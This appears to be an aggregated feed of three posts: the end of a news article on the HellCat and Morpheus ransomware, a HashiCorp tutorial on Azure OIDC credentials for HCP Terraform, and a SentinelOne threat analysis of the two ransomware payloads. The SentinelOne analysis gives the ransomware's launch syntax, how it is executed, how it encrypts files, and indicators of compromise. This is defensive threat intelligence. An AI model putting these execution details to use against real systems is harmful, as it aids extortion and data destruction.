Barring encrypting the files and dropping identical ransom notes, no other system modifications are made to the affected systems, such as changing the desktop wallpaper or setting up persistence mechanisms.

SentinelOne said the ransom notes for HellCat and Morpheus follow the same template as Underground Team, another ransomware scheme that sprang forth in 2023, although the ransomware payloads themselves are structurally and functionally different.

"HellCat and Morpheus RaaS operations appear to be recruiting common affiliates," Walter said. "While it is not possible to assess the full extent of interaction between the owners and operators of these services, it appears that a shared codebase or possibly a shared builder application is being leveraged by affiliates tied to both groups."

The development comes as ransomware continues to thrive, albeit in an increasingly fragmented fashion, despite ongoing attempts by law enforcement agencies to tackle the menace.

"The financially motivated ransomware ecosystem is increasingly characterized by the decentralization of operations, a trend spurred by the disruptions of larger groups," Trustwave said. "This shift has paved the way for smaller, more agile actors, shaping a fragmented yet resilient landscape."

Data shared by NCC Group shows that a record 574 ransomware attacks were observed in December 2024 alone, with FunkSec accounting for 103 incidents. Some of the other prevalent ransomware groups were Cl0p (68), Akira (43), and RansomHub (41).

"December is usually a much quieter time for ransomware attacks, but last month saw the highest number of ransomware attacks on record, turning that pattern on its head," Ian Usher, associate director of Threat Intelligence Operations and Service Innovation at NCC Group, said.

"The rise of new and aggressive actors, like FunkSec, who have been at the forefront of these attacks is alarming and suggests a more turbulent threat landscape heading into 2025."

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.



from The Hacker News https://ift.tt/bXfg75p
via IFTTT

Access Azure from HCP Terraform with OIDC federation

Storing long-lived Azure credentials poses a security risk. While HCP Terraform secures sensitive credentials as write-only variables, you must audit the usage of long-lived credentials to detect if they are compromised. Many organizations have a policy to block these types of credentials.

A more secure and better alternative is available for authentication: dynamic provider credentials on HCP Terraform. This feature allows Terraform to authenticate to Azure as a service principal through a native OpenID Connect (OIDC) integration. HCP Terraform obtains temporary credentials for each run, and discards the credentials when the run completes. These credentials allow you to call Azure APIs that the service principal has access to at runtime. These credentials are short-lived by design, so their usefulness to an attacker is limited.

In this blog post, we’ll explore dynamic credentials for Azure and walk you through the required steps to set this up for yourself.

Tutorial: Dynamic credentials for Azure

For this tutorial, you will use HCP Terraform to configure dynamic credentials for Azure by setting up a trust relationship between HCP Terraform and Azure (Entra ID). This configuration allows HCP Terraform to authenticate with Azure and obtain temporary credentials for provisioning resources.

Configuring dynamic provider credentials consists of three high-level steps:

  1. Set up a trust relationship between HCP Terraform and Azure.
  2. Configure Azure platform access.
  3. Configure resources on HCP Terraform to use dynamic credentials.

To follow this tutorial, you should:

  • Be authenticated to both Azure and HCP Terraform in your local terminal session
  • Have permissions to create an app registration and service principal in Entra ID
  • Have permissions to assign Azure RBAC roles for the service principal

Set up a trust relationship between HCP Terraform and Azure

To interact with Azure, Entra ID, and HCP Terraform you will need to use the azurerm, azuread, and tfe providers in your Terraform configuration:

terraform {
  required_providers {
    azuread = {
      source  = "hashicorp/azuread"
      version = "3.0.2"
    }

    azurerm = {
      source  = "hashicorp/azurerm"
      version = "4.14.0"
    }

    tfe = {
      source  = "hashicorp/tfe"
      version = "0.62.0"
    }
  }
}

provider "azuread" {}

provider "azurerm" {
  features {}

  subscription_id = "xxxxxxxxxx"
}

provider "tfe" {
  organization = "xxxxxxxxxx"
}

All three providers perform implicit authentication with the credentials available in the environment at runtime.

You’ll authenticate to Azure and Entra ID using the Azure CLI. For guidance on setting up the Azure CLI, refer to the Azure CLI documentation. While there are alternative methods to authenticate to Azure and Entra ID, we prefer using the Azure CLI for its simplicity. For more details, check the documentation for the Azure or Entra ID providers.

Begin by creating an application in Entra ID and a corresponding service principal:

resource "azuread_application" "hcp_terraform" {
  display_name = "hcp-terraform-azure-oidc"
}

resource "azuread_service_principal" "hcp_terraform" {
  client_id = azuread_application.hcp_terraform.client_id
}

Below, you’ll start by establishing an OIDC trust relationship using a federated identity credentials resource. This resource is configured with an audience (api://AzureADTokenExchange), an issuer (https://app.terraform.io) and a subject.

A subject has the following format that includes details from your HCP Terraform environment:

organization:<name>:project:<name>:workspace:<name>:run_phase:<operation>

Below is a specific example of a plan operation in an HCP Terraform organization named “my-organization”. Also included is an example project named "my-project" and a workspace named "my-workspace":

organization:my-organization:project:my-project:workspace:my-workspace:run_phase:plan

It is a good practice to use a federated credential for a single purpose. It's also possible to use different service principals for Terraform plan and apply operations.

In this tutorial we use a single service principal with two different federated credentials, one for plan operations and one for apply operations.

First, you need to create federated credentials for the workspace’s plan operations:

# data source to reference the current hcp terraform organization
data "tfe_organization" "current" {}

resource "azuread_application_federated_identity_credential" "plan" {
  application_id = azuread_application.hcp_terraform.id
  display_name   = "${azuread_application.hcp_terraform.display_name}-plan"
  audiences      = ["api://AzureADTokenExchange"]
  issuer         = "https://app.terraform.io"
  description    = "For HCP Terraform plan operations"

  subject = join(":", [
    "organization",
    data.tfe_organization.current.name,
    "project",
    tfe_project.default.name,
    "workspace",
    tfe_workspace.default.name,
    "run_phase",
    "plan"
  ])
}

Next, create federated credentials for the workspace’s apply operations:

resource "azuread_application_federated_identity_credential" "apply" {
  application_id = azuread_application.hcp_terraform.id
  display_name   = "${azuread_application.hcp_terraform.display_name}-apply"
  audiences      = ["api://AzureADTokenExchange"]
  issuer         = "https://app.terraform.io"
  description    = "For HCP Terraform apply operations"

  subject = join(":", [
    "organization",
    data.tfe_organization.current.name,
    "project",
    tfe_project.default.name,
    "workspace",
    tfe_workspace.default.name,
    "run_phase",
    "apply"
  ])
}

Configure Azure platform access

The Azure service principal currently has no permissions to perform any actions on Azure.

You should provide the service principal with one or more Azure RBAC roles. These allow it to perform the actions required by the Terraform configuration where it will be used.

For the purpose of this demo, give the service principal the built-in Storage Account Contributor role to allow it to create and manage storage accounts on Azure. You will also set up a custom role to allow it to create resource groups on Azure.

Our custom Resource Group Creator role is defined and assigned to the service principal like this:

# data source for the current azure subscription
data "azurerm_subscription" "current" {}

resource "azurerm_role_definition" "resource_group_creator" {
  name  = "Resource Group Creator"
  scope = data.azurerm_subscription.current.id

  permissions {
    actions = [
      "*/read",
      "Microsoft.Resources/subscriptions/resourceGroups/write",
    ]
  }

  assignable_scopes = [
    data.azurerm_subscription.current.id,
  ]
}

resource "azurerm_role_assignment" "resource_group_creator" {
  scope              = data.azurerm_subscription.current.id
  principal_id       = azuread_service_principal.hcp_terraform.object_id
  role_definition_id = azurerm_role_definition.resource_group_creator.role_definition_resource_id
}

Similarly, assigning the Storage Account Contributor role to the service principal on the Azure subscription scope is done like this:

resource "azurerm_role_assignment" "storage_account_contributor" {
  scope                = data.azurerm_subscription.current.id
  principal_id         = azuread_service_principal.hcp_terraform.object_id
  role_definition_name = "Storage Account Contributor"
}

Configure resources on HCP Terraform to use dynamic credentials

First, we create the HCP Terraform project and workspace that will use the dynamic credentials. Alternatively, feel free to use an existing project in your organization.

resource "tfe_project" "default" {
  name = "demo-project"
}

resource "tfe_workspace" "default" {
  name       = "demo-workspace"
  project_id = tfe_project.default.id
}

When using dynamic provider credentials, there’s no need to include authentication configuration in the provider block of your Terraform configuration. However, you must tell the HCP Terraform workspace that dynamic credentials should be generated.

Do this by configuring the appropriate environment variables in the workspace: set TFC_AZURE_PROVIDER_AUTH to true and TFC_AZURE_RUN_CLIENT_ID to the client ID of the service principal that HCP Terraform should use for authentication during runtime.

resource "tfe_variable" "tfc_azure_provider_auth" {
  key             = "TFC_AZURE_PROVIDER_AUTH"
  value           = "true"
  category        = "env"
  workspace_id    = tfe_workspace.default.id
}

resource "tfe_variable" "tfc_azure_run_client_id" {
  sensitive       = true
  key             = "TFC_AZURE_RUN_CLIENT_ID"
  value           = azuread_service_principal.hcp_terraform.client_id
  category        = "env"
  workspace_id    = tfe_workspace.default.id
}

Once configured, HCP Terraform automatically retrieves temporary credentials for the service principal and injects them via the workspace environment variables, allowing you to focus on building infrastructure without the need to manage authentication.

Using dynamic provider credentials

Now you’re ready to use the established trust relationship to provision resources on Azure.

Using dynamic provider credentials, there’s no need to define anything within the provider itself. By sharing the variable set containing the Azure service principal information with an HCP Terraform workspace, you automatically provide that workspace with access to Azure.

HCP Terraform does this by interacting with Azure (Entra ID to be specific) at runtime to obtain temporary credentials using the environment variables from the shared variable set. This allows you to securely scale access management within HCP Terraform by delegating access from one workspace to another while precisely restricting Azure access to only what the service principal needs.

Using the service principal created earlier, which has been assigned the Storage Account Contributor role and a custom Resource Group Creator role, you can begin creating infrastructure on Azure.

A sample Terraform configuration that can be deployed from HCP Terraform using the established trust relationship is shown below. Note that the subject you configured for the federated credentials must match the organization, project, and workspace names where you deploy this configuration from.

provider "azurerm" {
  features {}
  use_cli = false

  subscription_id = "xxxxxxx"
  tenant_id       = "xxxxxxx"
}

resource "random_string" "suffix" {
  length  = 10
  upper   = false
  special = false
}

resource "azurerm_resource_group" "default" {
  name     = "rg-demo-${random_string.suffix.result}"
  location = "westeurope"
}

resource "azurerm_storage_account" "test" {
  name                = "st${random_string.suffix.result}"
  resource_group_name = azurerm_resource_group.default.name
  location            = azurerm_resource_group.default.location

  account_tier             = "Standard"
  account_replication_type = "LRS"
}

Dynamic provider credentials at scale

To scale the solution described above, we recommend a pattern where one or more HCP Terraform workspaces configure dynamic provider credentials for other workspaces. This enables the platform team to create HCP Terraform workspaces with pre-configured Azure authentication, scoped to specific service principals, per team.

Create an HCP Terraform variable set for each workspace, as described in the discussion above. The variable set for each workspace has two environment variables. These are the same two environment variables from the demo above: TFC_AZURE_PROVIDER_AUTH and TFC_AZURE_RUN_CLIENT_ID. These credentials are injected into the provider to grant access to any Azure API permitted by the service principal’s permissions.

Below is an example configuration of a variable set for a team (e.g. “Team A”).

First, create the variable set:

resource "tfe_variable_set" "oidc_team_a_dev" {
  name         = "oidc-team-a-dev"
  description  = "OIDC federation configuration for team A (dev)"
  organization = "XXXXXXXXXXXXXXX"
}

Next, set up the required environment variables and link them to the variable set:

resource "tfe_variable" "tfc_azure_provider_auth" {
  key             = "TFC_AZURE_PROVIDER_AUTH"
  value           = "true"
  category        = "env"
  variable_set_id = tfe_variable_set.oidc_team_a_dev.id
}

resource "tfe_variable" "tfc_azure_run_client_id" {
  sensitive       = true
  key             = "TFC_AZURE_RUN_CLIENT_ID"
  value           = azuread_service_principal.team_a_dev.client_id
  category        = "env"
  variable_set_id = tfe_variable_set.oidc_team_a_dev.id
}

Finally, share the variable set with Team A by connecting it to their development workspace. This ensures that the targeted workspace receives and uses the environment variables, allowing HCP Terraform to automatically obtain and inject the temporary credentials:

resource "tfe_workspace_variable_set" "oidc_team_a_dev" {
  variable_set_id = tfe_variable_set.oidc_team_a_dev.id
  workspace_id    = "ws-XXXXXXXXXXXXXXX"
}

Set up similar resources for each team that should have access to Azure. You will also need to configure Azure RBAC permissions for each service principal.

Learn more about OIDC federation using Microsoft Entra ID

For more on how to securely access Azure from HCP Terraform with OIDC federation, check out Use dynamic credentials with the Azure provider and the OIDC federation documentation. Find a more complete example of configuring the Azure OIDC identity provider on GitHub.



from HashiCorp Blog https://ift.tt/edTFKkU
via IFTTT

HellCat and Morpheus | Two Brands, One Payload as Ransomware Affiliates Drop Identical Code

The previous six months have seen heightened activity around new and emerging ransomware operations. Across the tail-end of 2024 and into 2025, we have seen the rise of groups such as FunkSec, Nitrogen and Termite. In addition, we have seen the return of Cl0p and a new version of LockBit (aka LockBit 4.0).

Within this period of accelerated activity, the Ransomware-as-a-Service offerings HellCat and Morpheus have gained additional momentum and notoriety. Operators behind HellCat, in particular, have been vocal in their efforts to establish the RaaS as a ‘reputable’ brand and service within the crimeware economy.

As a result of this recent activity, we analyzed payloads from both HellCat and Morpheus ransomware operations. In this post, we discuss how affiliates across both operations are compiling payloads that contain almost identical code. We take a high-level look at two samples in particular and examine their characteristics and behavior.

HellCat Overview

HellCat Ransomware emerged in mid-2024. The primary operators behind HellCat are high-ranking members of the BreachForums community and its various factions. These personas, including Rey, Pryx, Grep and IntelBroker, have been affiliated with the breaches of numerous high-value targets.

HellCat has leaned heavily into the public side of their persona with novel ransom demands and direct media coverage to drive their position within the ransomware landscape. By their own admissions, HellCat operators are focused on high-value “big game” targets and government entities.

Morpheus Overview

Morpheus RaaS launched a data leaks site (DLS) in December 2024, though the group’s activity can be tracked back to at least September. Morpheus functions as a semi-private RaaS, and its public branding efforts are far less visible than Hellcat.

At the time of writing, Morpheus has listed two victims in the pharmaceutical and manufacturing industries. The affiliate discussed below currently targets Italian organizations with a focus on virtual ESXi environments. Ransom demands from Morpheus affiliates are known to reach as high as 32BTC (~$3 million USD as of this writing).

An Affiliate in Common

In late December 2024, our research team observed two similar ransomware payloads uploaded to VirusTotal on December 22 and December 30.

SHA1 Filename Uploaded
f86324f889d078c00c2d071d6035072a0abb1f73 100M.exe December 22, 2024
b834d9dbe2aed69e0b1545890f0be6f89b2a53c7 100M_redacted.exe December 30, 2024

Both files were uploaded to VirusTotal via the web interface from a user that was not signed in and bear the same submitter ID. Based on this and other telemetry data, we believe it is likely that the samples were uploaded by the same affiliate dabbling in both Morpheus and HellCat campaigns.

HellCat VirusTotal Submission
HellCat VirusTotal Submission
Morpheus VirusTotal Submission
Morpheus VirusTotal Submission

These two payload samples are identical except for victim specific data and the attacker contact details.

Zoomed out comparison of payload binaries (differences highlighted)
Zoomed out comparison of payload binaries (differences highlighted)
Zoomed in comparison of payload binaries (differences highlighted)
Zoomed in comparison of payload binaries (differences highlighted)

Payload Behavior

The Morpheus/HellCat payload is a standard, 64bit PE file. Both samples are ~18KB in size. Execution of the payload requires a path be provided as an argument. The ww argument is also accepted, and this was the parameter used by the affiliate associated with these samples.

encryptor.exe ww
encryptor.exe {path}

A further file named er.bat was uploaded to VirusTotal with the same submitter ID on December 31, 2024 and gives us a glimpse into how the Morpheus sample was executed on target systems. er.bat (SHA1: f62d2038d00cb44c7cbd979355a9d060c10c9051 ) contains multiple copy commands, followed by execution of the ransomware.

er.bat launches Morpheus ransomware
er.bat launches Morpheus ransomware

Other files referenced in er.bat are associated with nginx (web server) and various Trend Micro products. The script copies these items from a network share to the local C:\users\public\ folder, followed by execution of the Morpheus ransomware with the ww parameter.

Both the HellCat and Morpheus samples are built with a hard-coded list of extensions to exclude from the encryption process:

  • .dll
  • .sys
  • .exe
  • .drv
  • .com
  • .cat

Additionally, the ransomware excludes the \Windows\System32 folder from encryption.

Upon launch, the payload processes files in the targeted path. An unusual characteristic of these Morpheus and HellCat payloads is that they do not alter the extension of targeted and encrypted files. The file contents will be encrypted, but file extensions and other metadata remain intact after processing by the ransomware.

HellCat-encrypted files, no extension change
HellCat-encrypted files, no extension change

The Morpheus and HellCat samples use the Windows Cryptographic API for key generation and file encryption. BCrypt is used to generate an encryption key, followed by encryption of the contents of the file. Similar approaches to encryption (using the Windows Cryptographic API) have been taken in the past by early versions of LockBit and ALPHV and many others.

HellCat key generation via BCrypt
HellCat key generation via BCrypt

The BCryptEncrypt is, in turn, used to encrypt the context of each file processed.

BCrypt / Windows Crypto use in HellCat/Morpheus
BCrypt / Windows Crypto use in HellCat/Morpheus

There are no further system modifications made beyond the file encryption and ransom note drop (no wallpaper change, schedule tasks, or persistence mechanisms)

For both Morpheus and HellCat, the ransom note is written to disk as _README_.txt. Once all available files, on all available volumes, have been processed, the ransomware note will be launched via notepad from the C:\Users\Public\_README_.txt instance of the file.

Display of HellCat/Morpheus ransom note
Display of HellCat/Morpheus ransom note
Morpheus Ransom note displayed post-encryption
Morpheus Ransom note displayed post-encryption
HellCat (left) and Morpheus (right) ransom notes
HellCat (left) and Morpheus (right) ransom notes

Ransom notes for the payloads are nearly identical and follow the same template and flow. The only differences are from the “Sources of Information” section onward.

Victim-specific infrastructure varies, but the layout within the note is the same, with the same quantity of sources listed across each note. The “Contacts” section contains the operation-specific contact details (HellCat or Morpheus), including the contact email address, .onion URL and victim login details. In each note, victims are instructed to login to the attacker’s .onion portal with a provided set of credentials.

Attackers contact details displayed in the ransom notes
Attackers contact details displayed in the ransom notes

Similarities with Underground Team Ransomware

Underground Team emerged as a RaaS operation in early to mid 2023. It is still active as of this writing and the associated data leak site has entries as recent as December 2024.

Underground Team data leak site as of January 2025
Underground Team data leak site as of January 2025

The ransom notes for HellCat and Morpheus described in the previous section follow the same template as analyzed notes from the Underground Team.

Underground Team ransom note
Underground Team ransom note

Despite this similarity, the ransomware payloads analyzed from the Underground Team are structurally and functionally different from HellCat and Morpheus samples. Presently, there is not sufficient evidence to support any sort of shared codebase or ‘partnering’ between Underground Team, HellCat and Morpheus. While it is completely possible that there are affiliates that are tied to Underground Team and Hellcat/Morpheus, assuming any deeper connection would be speculation at this time.

Conclusion

HellCat and Morpheus payloads are almost identical and both are atypical to other ransomware families in leaving original file extensions in place after encryption. While it is not possible to assess the full extent of interaction between the owners and operators of these ransomware services, it appears that a shared codebase or possibly a shared builder application is being leveraged by affiliates tied to both groups.

As these operations continue to compromise businesses and organizations, understanding how common code is sourced and shared across these groups can help inform detection efforts and improve threat intelligence regarding how these groups operate.

SentinelOne Singularity is capable of detecting and preventing the malicious behaviors and TTPs associated with HellCat and Morpheus ransomware.

Indicators of Compromise

Files (SHA1):
b834d9dbe2aed69e0b1545890f0be6f89b2a53c7 “HellCat”
f62d2038d00cb44c7cbd979355a9d060c10c9051 er.bat (Morpheus)
f86324f889d078c00c2d071d6035072a0abb1f73 “Morpheus”

Network:

hellcakbszllztlyqbjzwcbdhfrodx55wq77kmftp4bhnhsnn5r3odad[.]onion    HellCat DLS
izsp6ipui4ctgxfugbgtu65kzefrucltyfpbxplmfybl5swiadpljmyd[.]onion    Morpheus DLS

hellcat[.]locker    HellCat file service

Personas:
h3llr4ns[@]onionmail[.]com
morpheus[@]onionmail[.]com



from SentinelOne https://ift.tt/zLNO2jp
via IFTTT